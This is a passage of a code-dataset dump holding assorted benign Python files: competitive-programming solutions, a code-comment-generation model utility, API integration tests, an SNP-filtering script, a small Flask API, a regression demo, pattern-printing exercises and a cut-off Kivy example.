bbox_inches='tight')\n","repo_name":"bvillasen/cosmo_sims","sub_path":"halo_analysis/find_halos.py","file_name":"find_halos.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42969719959","text":"def d(s):\n return len(list(str(s)))\n\n\na, b, x = map(int, input().split())\n\n\ndef bin_search():\n INF = 10 ** 9\n if a * INF + b * d(INF) <= x:\n return INF\n\n pl = 0\n pr = INF\n while True:\n pc = (pl + pr) // 2\n if x-1 < a * pc + b * d(pc) <= x:\n return pc\n elif a * pc + b * d(pc) > x:\n pr = pc - 1\n else:\n pl = pc + 1\n if pl > pr:\n break\n while pr > 0:\n if a * pr + b * d(pr) <= x:\n return pr\n pr -= 1\n return 0\n\n\nprint(bin_search())\n","repo_name":"Okabe-Junya/AtCoderArchive","sub_path":"ABC/101-150/146/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5247489500","text":"import copy\nimport json\nimport math\nimport os\nimport pickle\nimport re\nimport javalang\nimport nltk\nimport numpy as np\nimport tensorflow as tf\nfrom config import *\nfrom model import *\nfrom rouge_score import rouge_scorer\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n# nltk.download('punkt')\n\n\ndef split_identifier(identifier: str):\n \"\"\"\n Usage:\n 1. \"camelCase\" -> [\"camel\", \"Case\"]\n 2. \"snake_case\" -> [\"snake\", \"_\", \"case\"]\n 3. 
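In the `d(s)`/binary-search snippet above, the cost `a*n + b*digits(n)` is nondecreasing in `n` for positive `a` and `b`, so a plain "last value satisfying the predicate" binary search suffices, with no per-digit-length casework or backtracking loop. A sketch (the function name and sample values are illustrative):

```python
def max_buyable(a, b, x, hi=10**9):
    """Largest n in [1, hi] with a*n + b*len(str(n)) <= x, or 0 if none.
    Works because the cost is nondecreasing in n."""
    def cost(n):
        return a * n + b * len(str(n))
    if cost(1) > x:
        return 0
    lo = 1
    while lo < hi:
        mid = (lo + hi + 1) // 2  # round up so the loop always makes progress
        if cost(mid) <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo

print(max_buyable(10, 7, 100))  # 9: cost(9) = 90 + 7 <= 100, cost(10) = 100 + 14 > 100
```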
\"normal\" -> [\"normal\"]\n \"\"\"\n if \"_\" in identifier:\n return identifier.split(\"_\")\n elif identifier != identifier.lower() and identifier != identifier.upper():\n # regular expression for camelCase\n matches = re.finditer(\n '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)',\n identifier\n )\n return [m.group(0) for m in matches]\n return [identifier]\n\n\ndef get_batch(inp: list, batch_sz: int):\n \"\"\"\n Return shape:\n [None, batch_sz, None]\n Example:\n a = [1,2,3,4,5,6,7,8,9,10]\n a = getBatch(inp=a, batch_sz=3)\n ---output---\n [[1,2,3], [4,5,6], [7,8,9]]\n \"\"\"\n dataset = []\n while len(inp) >= batch_sz:\n dataset.append(inp[:batch_sz])\n inp = inp[batch_sz:]\n if isinstance(inp, np.ndarray):\n return np.array(dataset)\n return dataset\n\n\ndef ngram(words, n):\n return list(zip(*(words[i:] for i in range(n))))\n\n\ndef code_tokenize(code):\n inputs = []\n tokens_parse = javalang.tokenizer.tokenize(code)\n for token in tokens_parse:\n token = str(token).split(' ')\n # split the camelCase and snake_case\n splitted_id = split_identifier(token[1].strip('\"'))\n inputs.extend(splitted_id)\n inputs.insert(0, '')\n inputs.append('')\n return inputs\n\n\ndef token_to_index(seq, voc):\n \"\"\"\n ['public', 'void', ... ''] -> [55, 66, ..., 2]\n \"\"\"\n seq_index = []\n for token in seq:\n if token not in voc:\n seq_index.append(voc.index(''))\n else:\n seq_index.append(voc.index(token))\n return seq_index\n\n\ndef token_zero_padding(seq, voc, max_length):\n # index of '' is 0\n seq += [voc.index('')] * (max_length - len(seq))\n seq = np.array(seq)\n return seq\n\n\ndef greedy_search(code, encoder, decoder, train_data):\n code = code_tokenize(code)\n if len(code) >= train_data['max_length_code']:\n code = code[:train_data['max_length_code']-1]\n code = token_to_index(code, train_data['code_voc'])\n code = token_zero_padding(code, train_data['code_voc'], train_data['max_length_code'])\n code = tf.expand_dims(code, 0)\n result = ''\n hidden = encoder.initialize_hidden_state(batch_sz=1)\n enc_output, enc_hidden_h, enc_hidden_c = encoder(code, hidden)\n dec_hidden = [enc_hidden_h, enc_hidden_c]\n dec_input = tf.expand_dims([train_data['comment_voc'].index('')], 1)\n\n for t in range(train_data['max_length_com']):\n predictions, dec_hidden_h, dec_hidden_c = decoder(dec_input, dec_hidden, enc_output)\n dec_hidden = [dec_hidden_h, dec_hidden_c]\n predicted_id = tf.argmax(predictions[0]).numpy()\n if train_data['comment_voc'][predicted_id] == '':\n return result\n result += train_data['comment_voc'][predicted_id] + ' '\n # the predicted ID is fed back into the model\n dec_input = tf.expand_dims([predicted_id], 0)\n\n return result\n\n\ndef predict_word_for_each_candidate(pred_info, decoder, enc_output, comment_voc, width):\n \"\"\"\n it is called by beam search,\n it predicts one words for each of 'width * width' candidates,\n and also handle the joint scores, hidden states of decorder, etc.\n \"\"\"\n cand_info = []\n for i in range(width):\n for x in range(width):\n cand_info += [copy.deepcopy(pred_info[i])]\n\n if pred_info[i]['end'] is True:\n continue\n\n predictions, dec_hidden_h, dec_hidden_c = decoder(\n pred_info[i]['dec_input'],\n pred_info[i]['dec_hidden'],\n enc_output\n )\n pred_info[i]['dec_hidden'] = [dec_hidden_h, dec_hidden_c]\n predictions = tf.nn.softmax(predictions)\n # pick out top k new words for each prediction comments\n topk_score = tf.math.top_k(predictions[0], width)[0]\n topk_id = tf.math.top_k(predictions[0], width)[1]\n\n for x in range(width):\n 
cand_info[width*i+x]['scores'] *= topk_score[x].numpy()\n if comment_voc[topk_id[x].numpy()] == '':\n cand_info[width*i+x]['end'] = True\n else:\n cand_info[width*i+x]['gen_comments'] += comment_voc[topk_id[x].numpy()] + ' '\n cand_info[width*i+x]['dec_input'] = tf.expand_dims([topk_id[x].numpy()], 0)\n cand_info[width*i+x]['dec_hidden'] = pred_info[i]['dec_hidden']\n\n return cand_info, pred_info\n\n\ndef beam_search(code, encoder, decoder, train_data, width):\n code = code_tokenize(code)\n code = token_to_index(code, train_data['code_voc'])\n code = token_zero_padding(code, train_data['code_voc'], train_data['max_length_code'])\n code = tf.expand_dims(code, 0)\n\n hidden = encoder.initialize_hidden_state(batch_sz=1)\n enc_output, enc_hidden_h, enc_hidden_c = encoder(code, hidden)\n # pred_info : a list having 'width' elements, each element represent one prediction comment\n pred_info = []\n for i in range(width):\n pred_info.append({\n 'gen_comments': '',\n 'scores': 1,\n 'end': False, # used to determine whether the prediction comments end\n 'dec_input': tf.expand_dims([train_data['comment_voc'].index('')], 1),\n 'dec_hidden': [enc_hidden_h, enc_hidden_c]\n })\n\n for t in range(train_data['max_length_com']):\n # cand_info : a list having 'width * width' elements\n cand_info, pred_info = predict_word_for_each_candidate(\n pred_info,\n decoder,\n enc_output,\n train_data['comment_voc'],\n width\n )\n # because the candidate of 1st iteration must be all the same\n if t == 0:\n pred_info = cand_info[:width]\n continue\n else:\n sorted_index = sorted(range(width ** 2), key=lambda k: cand_info[k]['scores'], reverse=True)[:width]\n # pick first 'width' best candidate comments as the temporary predictions\n for x in range(width):\n pred_info[x] = cand_info[sorted_index[x]]\n if False not in [pred_info[x]['end'] for x in range(width)]:\n break\n # select the comments with the highest joint scores as prediction\n return pred_info[0]['gen_comments']\n\n\ndef read_train_pkl():\n \"\"\"\n return a dict(), having several training data information\n \"\"\"\n f = open('./simplified_dataset/train_ComCNN_data.pkl', 'rb')\n code_train, comment_train, code_voc, comment_voc = pickle.load(f)\n code_voc_size = len(code_voc)\n com_voc_size = len(comment_voc)\n max_length_code = max(len(t) for t in code_train)\n max_length_com = max(len(t) for t in comment_train)\n train_data = {\n 'code': code_train,\n 'comment': comment_train,\n 'code_voc': code_voc,\n 'comment_voc': comment_voc,\n 'code_voc_size': code_voc_size,\n 'com_voc_size': com_voc_size,\n 'max_length_code': max_length_code,\n 'max_length_com': max_length_com\n }\n return train_data\n\n\ndef read_testset(**kwargs):\n \"\"\"\n return a list of many dicts having 'code' and 'comment' keys\n \"\"\"\n if \"path\" in kwargs:\n f = open(kwargs['path'])\n else:\n f = open('./simplified_dataset/simplified_test.json')\n inputs = f.readlines()\n f.close()\n test_data = []\n\n for pair in inputs:\n pair = json.loads(pair)\n test_data.append({'code': pair['code'], 'comment': pair['nl']})\n\n return test_data\n\n\ndef bleu(true, pred, n):\n true = nltk.word_tokenize(true)\n pred = nltk.word_tokenize(pred)\n c = len(pred)\n r = len(true)\n bp = 1. if c > r else np.exp(1 - r / (c + 1e-10))\n score = 0\n\n for i in range(1, n+1):\n true_ngram = set(ngram(true, i))\n pred_ngram = ngram(pred, i)\n if len(true_ngram) == 0 or len(pred_ngram) == 0:\n break\n length = float(len(pred_ngram)) + 1e-10\n count = sum([1. if t in true_ngram else 0. 
for t in pred_ngram])\n score += math.log(1e-10 + (count / length))\n # n就是公式的Wn\n score = math.exp(score / n)\n bleu = bp * score\n return bleu\n\n\ndef tf_idf(ngram_list, ngram, total_ngram_count):\n count = ngram_list.count(ngram)\n tf = count / total_ngram_count\n # in our dataset, tf-idf is either (tf*1) or (0* every large number)\n # so idf=1 results in the same consequence\n idf = 1\n return tf * idf\n\n\ndef cider(true, pred):\n true = nltk.word_tokenize(true)\n pred = nltk.word_tokenize(pred)\n N = 4\n cider_score = 0\n for n in range(1, 5):\n true_ngram = ngram(true, n)\n pred_ngram = ngram(pred, n)\n if len(true_ngram) == 0 or len(pred_ngram) == 0:\n break\n\n total_ngram = true_ngram + pred_ngram\n total_ngram_count_in_cand = 1e-10\n total_ngram_count_in_ref = 1e-10\n\n for t in set(total_ngram):\n total_ngram_count_in_cand += pred_ngram.count(t)\n total_ngram_count_in_ref += true_ngram.count(t)\n g_cand = [tf_idf(pred_ngram, t, total_ngram_count_in_cand) for t in set(total_ngram)]\n g_ref = [tf_idf(true_ngram, t, total_ngram_count_in_ref) for t in set(total_ngram)]\n\n # inner product of two list\n g = sum([a*b for a, b in zip(g_cand, g_ref)])\n abs_cand = sum([a**2 for a in g_cand]) ** 0.5\n abs_ref = sum([a**2 for a in g_ref]) ** 0.5\n cider_score += (g / (abs_cand * abs_ref)) / N\n return cider_score\n\n\ndef get_checkpoint_dir():\n checkpoint_dir = ''\n if ARCH == \"lstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-lstm-lstm'\n elif ARCH == \"cnnlstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-cnnlstm-lstm'\n elif ARCH == \"cnnbilstm_lstm\":\n checkpoint_dir = './training_checkpoints/ComCNN-cnnbilstm-lstm'\n else:\n print('Error: get_checkpoint_dir')\n exit(0)\n return checkpoint_dir\n\n\ndef restore_model(encoder, decoder):\n checkpoint_dir = get_checkpoint_dir()\n optimizer = tf.optimizers.Adam(learning_rate=1e-3)\n checkpoint = tf.train.Checkpoint(optimizer=optimizer, encoder=encoder, decoder=decoder)\n checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir)).expect_partial()\n return encoder, decoder\n\n\ndef integrated_prediction(code, encoder, decoder, train_data, beam_k, method):\n if method == 'greedy':\n predict = greedy_search(code, encoder, decoder, train_data)\n elif method == 'beam_3' or method == 'beam_5':\n predict = beam_search(code, encoder, decoder, train_data, beam_k)\n return predict\n\n\ndef integrated_score(metric, test_output, predict):\n score = 0\n if metric == 'BLEU3':\n score = bleu(test_output, predict, 3)\n elif metric == 'BLEU4':\n score = bleu(test_output, predict, 4)\n elif metric == 'CIDEr':\n score = cider(test_output, predict)\n elif metric == 'ROUGE_L':\n scorer = rouge_scorer.RougeScorer(['rougeL'], use_stemmer=False)\n score = scorer.score(test_output, predict)['rougeL'].fmeasure\n return score\n\n\ndef create_model(vocab_inp_size, vocab_tar_size, max_length_inp):\n if ARCH == \"lstm_lstm\":\n encoder = lstmEncoder(vocab_inp_size, EMBEDDING_DIM, UNITS)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, UNITS)\n elif ARCH == \"cnnlstm_lstm\":\n encoder = cnnlstmEncoder(vocab_inp_size, EMBEDDING_DIM, UNITS, max_length_inp)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, UNITS)\n elif ARCH == \"cnnbilstm_lstm\":\n encoder = cnnbilstmEncoder(vocab_inp_size, EMBEDDING_DIM, FILTERS, max_length_inp)\n decoder = Decoder(vocab_tar_size, EMBEDDING_DIM, FILTERS)\n\n return encoder, 
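The `bleu` helper above multiplies a brevity penalty by the geometric mean of n-gram precisions (`math.exp(score / n)` after summing logs; the Chinese comment `n就是公式的Wn` says that `n` plays the role of the weight `Wn` in the formula). A worked sketch of just the brevity-penalty factor, with the same `1e-10` guard against division by zero:

```python
import math

def brevity_penalty(cand_len, ref_len):
    """BP = 1 if the candidate is longer than the reference, else exp(1 - r/c)."""
    return 1.0 if cand_len > ref_len else math.exp(1 - ref_len / (cand_len + 1e-10))

print(brevity_penalty(4, 5))  # exp(1 - 5/4) ~= 0.7788: short candidates are penalised
print(brevity_penalty(6, 5))  # 1.0
```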
decoder\n","repo_name":"yurong0404/ComCNN","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12133,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32731873103","text":"# https://www.acmicpc.net/problem/2231\n\nn = int(input())\n\nfor number in range(1,n+1):\n # sum과 map을 이용하면 더 빠르다.\n # compare = number + sum(map(int, str(number)))\n\n compare = number \n for digit in str(number):\n compare += int(digit)\n if compare == n:\n print(number)\n break\nelse:\n print(0)","repo_name":"ghleokim/codeTestProblems","sub_path":"baekjoon/2231_bruteForce.py","file_name":"2231_bruteForce.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1233137944","text":"import pytest\n\nfrom model.responses.image_responses import CreateImageResponse\nfrom model.responses.user import UserHandlerResponse, GetUserByEmailResponse, GetUserByEmailResult\nfrom model.user_schemas import RequestUser, UserSchema\nfrom test.utils.utils import get_random_string\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_create_login_get_update_delete(test_client, unauthenticated, ensure_db_schema: None):\n new_username = f\"test_user_{get_random_string()}@gmail.com\"\n token = (\n await test_client.post(\n url=\"/users/\",\n req_body=RequestUser(\n parameter=UserSchema(\n email=new_username,\n password=\"1234\",\n phone_number=new_username,\n full_name=new_username,\n )\n ),\n resp_model=UserHandlerResponse,\n )\n ).result[\"token\"]\n response = await test_client.get(\n url=f\"/users/{new_username}\", resp_model=GetUserByEmailResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n assert response.result == GetUserByEmailResult(\n full_name=new_username,\n email=new_username,\n car_color=None,\n phone_number=new_username,\n car_model=None,\n plate_number=None,\n )\n response = await test_client.put(\n url=f\"/users/update\",\n req_body=RequestUser(parameter=UserSchema(full_name=\"Tznon Metoonaf\")),\n resp_model=UserHandlerResponse,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n del response.result[\"password\"]\n assert response == UserHandlerResponse(\n code=200,\n status=\"OK\",\n message=\"User updated successfully\",\n result={\n \"full_name\": \"Tznon Metoonaf\",\n \"email\": new_username,\n \"car_color\": None,\n \"phone_number\": new_username,\n \"car_model\": None,\n \"plate_number\": None,\n },\n detail=None,\n )\n assert (\n await test_client.delete(\n url=\"/users/delete\", resp_model=UserHandlerResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n ) == UserHandlerResponse(code=200, status=\"OK\", message=\"User deleted successfully\", result=None, detail=None)\n\n\nasync def test_validate_user(test_user, test_client, ensure_db_schema: None):\n token, new_username = test_user.token, test_user.email\n resp = await test_client.get(\n url=\"/users/validate_token\", resp_model=UserHandlerResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n assert resp.code == 200\n # assert resp.result == {\"is_valid\": True}\n\n\nasync def test_get_user_with_image(test_client, test_user, ensure_db_schema: None):\n token, new_username = test_user.token, test_user.email\n with open(\"test/resources/image-upload.png\", mode=\"rb\") as f:\n image_resp = await test_client.post(\n url=\"/images/upload\",\n req_body=None,\n resp_model=CreateImageResponse,\n files={\"image\": (\"Charmander\", f)},\n 
headers={\"Authorization\": f\"Bearer {token}\"},\n )\n\n user_response = await test_client.get(\n url=f\"/users/{new_username}\", resp_model=GetUserByEmailResponse, headers={\"Authorization\": f\"Bearer {token}\"}\n )\n\n assert user_response.result.image_url == f\"/images/{image_resp.id}\"\n\n await test_client.get(f\"/images/{image_resp.id}\", headers={\"Authorization\": f\"Bearer {token}\"})\n","repo_name":"talaloni2/driveup-backend","sub_path":"test/integration/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36763300787","text":"import os\nimport sys\nfrom pathlib import Path\n\n\ndef print_count(countValue):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Total Count: {countValue}') # Press Ctrl+F8 to toggle the breakpoint.\n\n\ndef SolveDay1PartA(filepath):\n currentCount = 0\n previousValue = 99999999\n with open(filepath, \"r\") as openedFile:\n fileData = openedFile.readlines()\n\n for fileLine in fileData:\n currentValue = int(fileLine)\n if currentValue > previousValue:\n currentCount += 1\n previousValue = currentValue\n return currentCount\n\ndef SolveDay1PartB(filepath):\n currentCount = 0\n\n with open(filepath, \"r\") as openedFile:\n fileData = openedFile.readlines()\n\n index = 0\n while index < len(fileData) - 3:\n currentSum = int(fileData[index]) + int(fileData[index+1]) + int(fileData[index+2])\n nextSum = int(fileData[index+1]) + int(fileData[index+2]) + int(fileData[index+3])\n if nextSum > currentSum:\n currentCount += 1\n index += 1\n return currentCount\n\n\nif len(sys.argv) != 2:\n quit()\n#day1FilePathPartA = sys.argv[1]\n#totalCount = SolveDay1(day1FilePath)\n\nday1FilePathPartB = sys.argv[1]\ntotalCount = SolveDay1PartB(day1FilePathPartB)\nprint_count(totalCount)\n","repo_name":"JSarasua/AdventOfCode2021","sub_path":"Source/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22347316470","text":"# encoding: utf-8\n\"\"\"\n8_calculate.py\nget sites:1. present in all three bio replicates in the same branch\n 2. not present in all eight branch\n\nCreated by www on 12:57 am, May 18, 2019\n\"\"\"\nimport numpy as np\nimport sys\nimport os\nimport gzip\nimport copy\n\ndef loadFile(inputFile, o, snps, sample, mask):\n sites = 0\n with gzip.open(inputFile, 'rt') as f:\n for line in f:\n if line[0] == '#':\n continue\n line = line.strip()\n if not line:\n continue\n #the end of file, can't find another method\n if line.startswith('TBI'):\n break\n #print(line)\n info = line.split()\n ref = info[0]\n alt = info[4]\n pos = int(info[1])\n #remove site in repeat or homoploymer regions\n if mask[ref][pos - 1] != 0:\n continue\n if not pos in snps[ref]:\n snps[ref][pos] = {}\n if not alt in snps[ref][pos]:\n snps[ref][pos][alt] = {}\n snps[ref][pos][alt][sample] = ''\n sites += 1\n o.write('%s\\t%d\\n' % (sample, sites))\n return snps\n\ndef output(samples, o, d):\n snps = {}\n diffSites = 0\n\n o.write('Number of SNP sites in all three replicates in the same branch\\n')\n\n for ID in samples:\n commonThreeRep = 0\n for ref in samples[ID]:\n if not ref in snps:\n snps[ref] = {}\n for pos in samples[ID][ref]:\n #if have more than two genotype, remove. 
(keep site: A/A, A/T, if the site is A/A, A/T, A/C, remove)\n if len(samples[ID][ref][pos]) != 1:\n continue\n #get SNP exist in all 3 bio replicates\n for alt in samples[ID][ref][pos]:\n if len(samples[ID][ref][pos][alt]) == 3:\n commonThreeRep += 1\n if not pos in snps[ref]:\n snps[ref][pos] = {}\n if not alt in snps[ref][pos]:\n snps[ref][pos][alt] = {}\n snps[ref][pos][alt][ID] = ''\n o.write('%s\\t%d\\n' % (ID, commonThreeRep))\n\n\n for ref in snps:\n for pos in snps[ref]:\n #if have more than two genotype, remove. (keep site: A/A, A/T, if the site is A/A, A/T, A/C, remove)\n if len(snps[ref][pos]) != 1:\n continue\n for alt in snps[ref][pos]:\n if len(snps[ref][pos][alt]) == 8:\n #print('All samples have the same alt')\n #print(ref, pos, alt, snps[ref][pos][alt])\n continue\n diffSites += 1\n d.write('%s\\t%s\\t%s\\t' % (ref, alt, pos))\n for ID in snps[ref][pos][alt]:\n d.write('%s,' % ID)\n d.write('\\n')\n o.write('Number of SNP sites do not co-exist in all 8 branches\\n%d\\n' % diffSites)\n\n\ndef loadRef(refFile, removeFile):\n refs = {}\n mask = {}\n with open(refFile) as f:\n for line in f:\n info = line.split()\n ref = info[0]\n length = int(info[1])\n refs[ref] = {}\n mask[ref] = np.zeros(length)\n with open(removeFile) as f:\n for line in f:\n info = line.split()\n ref = info[0]\n start = int(info[1])\n end = int(info[2])\n mask[ref][start - 1 : end] = 1\n\n return mask, refs\n\n\ndef main():\n inputDir = 'result/5_filter/'\n outputFile = 'result/5_filter/summary'\n outputDetail= 'result/5_filter/detail_site'\n removeFile = 'ref/masked/Epau.repeat.hmopolymer.sort.bed'\n refFile = 'ref/Epau.fa.fai'\n\n o = open(outputFile, 'w+')\n d = open(outputDetail, 'w+')\n\n samples = {}\n o.write('Number of SNP sites in each sample in the same branch\\n')\n\n f = os.walk(inputDir)\n\n mask, refs = loadRef(refFile, removeFile)\n\n for root, dirs, names in f:\n for name in names:\n if not 'snp.filter.biall.vcf.gz' in name:\n continue\n if name.split('.')[-1] == 'tbi':\n continue\n inputFile = os.path.join(root, name)\n\n #sample: A_1, A_2,...H_3\n sample = name.split('.snp')[0]\n #ID: A B C D E ... 
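`loadRef` above flags repeat/homopolymer intervals by writing ones into a per-contig NumPy array, treating `start` as 1-based inclusive (`mask[start - 1 : end] = 1`). A tiny standalone sketch of that slicing:

```python
import numpy as np

def build_mask(length, intervals):
    """Flag positions covered by (start, end) intervals, 1-based inclusive,
    mirroring mask[ref][start - 1 : end] = 1 above."""
    mask = np.zeros(length)
    for start, end in intervals:
        mask[start - 1:end] = 1
    return mask

print(build_mask(10, [(2, 4), (9, 10)]))  # [0. 1. 1. 1. 0. 0. 0. 0. 1. 1.]
```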
H\n ID = sample.split('_')[0]\n if not ID in samples:\n samples[ID] = copy.deepcopy(refs)\n\n samples[ID] = loadFile(inputFile, o, samples[ID], sample, mask)\n\n output(samples, o, d)\n\n o.close()\n d.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"asdcid/12-trees","sub_path":"removeRepeatSiteAndCalculate.py","file_name":"removeRepeatSiteAndCalculate.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5193557628","text":"#!/usr/bin/python3\n\"\"\"\nCreates a Flask application instance\n\"\"\"\n\nfrom flask import Flask, jsonify\nfrom models import storage\nimport os\n\napp = Flask(__name__)\n\n@app.teardown_appcontext\ndef close_storage(error):\n storage.close()\n\n@app.route('/api/v1/status')\ndef status():\n \"\"\"Returns the status of the API\"\"\"\n return jsonify({\"status\": \"OK\"})\n\n@app.errorhandler(404)\ndef not_found(error):\n return jsonify({\"error\": \"Not found\"}), 404\n\nif __name__ == \"__main__\":\n from api.v1.views import app_views\n app.register_blueprint(app_views)\n app.run(host=os.getenv('HBNB_API_HOST', '0.0.0.0'),\n port=int(os.getenv('HBNB_API_PORT', 5000)),\n threaded=True)\n\n","repo_name":"Mahmoudshee/AirBnB_clone_v3","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70652463554","text":"import pandas as pd\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.read_csv('homeprice.csv')\r\nprint(df)\r\n\r\nplt.xlabel('area')\r\nplt.ylabel('price')\r\nplt.grid()\r\nplt.scatter(df.area, df.price, color='blue', marker='*')\r\nplt.show()\r\n\r\nnew_df = df.drop('price', axis=\"columns\")\r\nprint(new_df)\r\n\r\nprice = df.price\r\nprint(type(price))\r\nnp.array(price)\r\n\r\nreg = linear_model.LinearRegression()\r\nreg.fit(new_df, price)\r\nprint(reg.predict([[4500]]))\r\nprint(reg.coef_)\r\nprint(reg.intercept_)\r\n\r\narea_df = pd.read_csv('area.csv')\r\narea_df.head()\r\n\r\np = reg.predict(area_df)\r\nprint(p)\r\narea_df['predicted_prices'] = p\r\nprint(area_df)\r\n\r\narea_df.to_csv('prediction.csv')\r\n\r\n","repo_name":"hasibarrafiul/AI-Problems","sub_path":"linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33126956163","text":"#1\ndef pypart(n):\n for i in range(0, n):\n for j in range(0, i + 1):\n print(\"*\", end=\" \")\n print(\"\\r\")\nn = 5\npypart(n)\n\n#2\ndef pypart1(n):\n myList = []\n for i in range(1, n + 1):\n myList.append(\"*\" * i)\n print(\"\\n\".join(myList))\n\nn = 5\npypart1(n)\n\n#3\ndef pypart2(n):\n k = 2*n - 2\n for i in range(0, n):\n for j in range(0, k):\n print(end=\" \")\n k = k - 2\n for j in range(0, i+1):\n print(\"*\", end=\" \")\n print(\"\\r\")\n\nn = 5\npypart2(n)\n\n#4\ndef triangle(n):\n k = 2*n - 2\n for i in range(0, n):\n for j in range(0, k):\n print(end=\" \")\n k = k - 1\n for j in range(0, i+1):\n print(\"*\", end=\" \")\n print(\"\\r\")\n\ntriangle(6)\n\n#5\ndef numpat(n):\n num = 1\n for i in range(0, n):\n num = 1\n for i in range(0, i+1):\n print(num, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\nnumpat(n)\n\n#6\ndef numpat1(n):\n num = 1\n for i in range(0, n):\n for j in 
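For the single-feature regression above, `reg.predict` is just `coef_ * x + intercept_`. A self-contained check on synthetic data — `homeprice.csv` isn't available here, so the numbers below are made up to follow an exact line:

```python
import numpy as np
from sklearn import linear_model

# synthetic stand-in for homeprice.csv: price = 150 * area + 10000
area = np.array([[1000], [2000], [3000], [4000]])
price = 150 * area.ravel() + 10000

reg = linear_model.LinearRegression()
reg.fit(area, price)

# for a single feature, predict() is coef_ * x + intercept_
x = 4500
assert np.isclose(reg.predict([[x]])[0], reg.coef_[0] * x + reg.intercept_)
print(reg.coef_[0], reg.intercept_)  # ~150.0 ~10000.0
```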
range(0, i+1):\n print(num, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\nnumpat1(n)\n\n#7\ndef alphabet(n):\n num = 65\n for i in range(0, n):\n for j in range(0, i+1):\n ch = chr(num)\n print(ch, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 6\nalphabet(n)\n\n#8\ndef contalpha(n):\n num = 65\n for i in range(0, n):\n for j in range(0, i+1):\n ch = chr(num)\n print(ch, end=\" \")\n num = num + 1\n print(\"\\r\")\nn = 5\ncontalpha(n)\n\n#chaining comparison\nx = 5\nprint(1 < x < 10)\nprint(10 < x < 20)\nprint(x < 10 < x*10 < 100)\nprint(10 > x <= 9)\nprint(5 == x > 4)\n\n#\na, b, c, d, e, f = 0, 5, 12, 0, 15, 15\nexp1 = a <= b < c > d is not e is f\nexp2 = a is d > f is not c\nprint(exp1)\nprint(exp2)\n\n#else with for\nfor i in range(1, 4):\n print(i)\nelse:\n print(\"No Break\")\n\n#\nfor i in range(1, 4):\n print(i)\n break\nelse:\n print(\"No Break\")\n\n#if array consist of even number\ndef contains_even_number(l):\n for eleement in l:\n if eleement % 2 == 0:\n print(\"list contains an even number\")\n break\n else:\n print(\"list does not contain an even number\")\n\nprint(\"\\nFor List 1:\")\ncontains_even_number([1, 9, 8])\nprint(\"\\nFor List 2:\")\ncontains_even_number([1, 3, 5])\n\n#\ncount = 0\nwhile (count < 1):\n count = count + 1\n print(count)\n break\nelse:\n print(\"No Break\")\n\n#dictionary mapping\ndef numbers_to_strings(argument):\n switcher = {\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n }\n return switcher.get(argument, 'nothing')\n\nif __name__ == \"__main__\":\n argument = 2\n print(numbers_to_strings(argument))\n","repo_name":"imradhetiwari/python","sub_path":"pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25176020945","text":"from kivy.app import App\nfrom kivy.clock import Clock\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.boxlayout import BoxLayout\n\n\nBuilder.load_string('''\n#:import barometer plyer.barometer\n:\n barometer: barometer\n orientation: 'vertical'\n padding: '50dp'\n spacing: '20dp'\n\n BoxLayout:\n orientation: 'horizontal'\n size_hint_y: 0.3\n Button:\n id: button_enable\n text: 'Enable'\n disabled: False\n on_release:\n root.enable()\n button_disable.disabled = not button_disable.disabled\n button_enable.disabled = not button_enable.disabled\n Button:\n id: button_disable\n text: 'Disable'\n disabled: True\n on_release:\n root.disable()\n button_disable.disabled = not button_disable.disabled\n button_enable.disabled = not button_enable.disabled\n\n Label:\n text: 'Current pressure:' + str(root.pressure) + ' hPa.'\n\n''')\n\n\nclass BarometerInterface(BoxLayout):\n '''Root Widget.'''\n\n barometer = 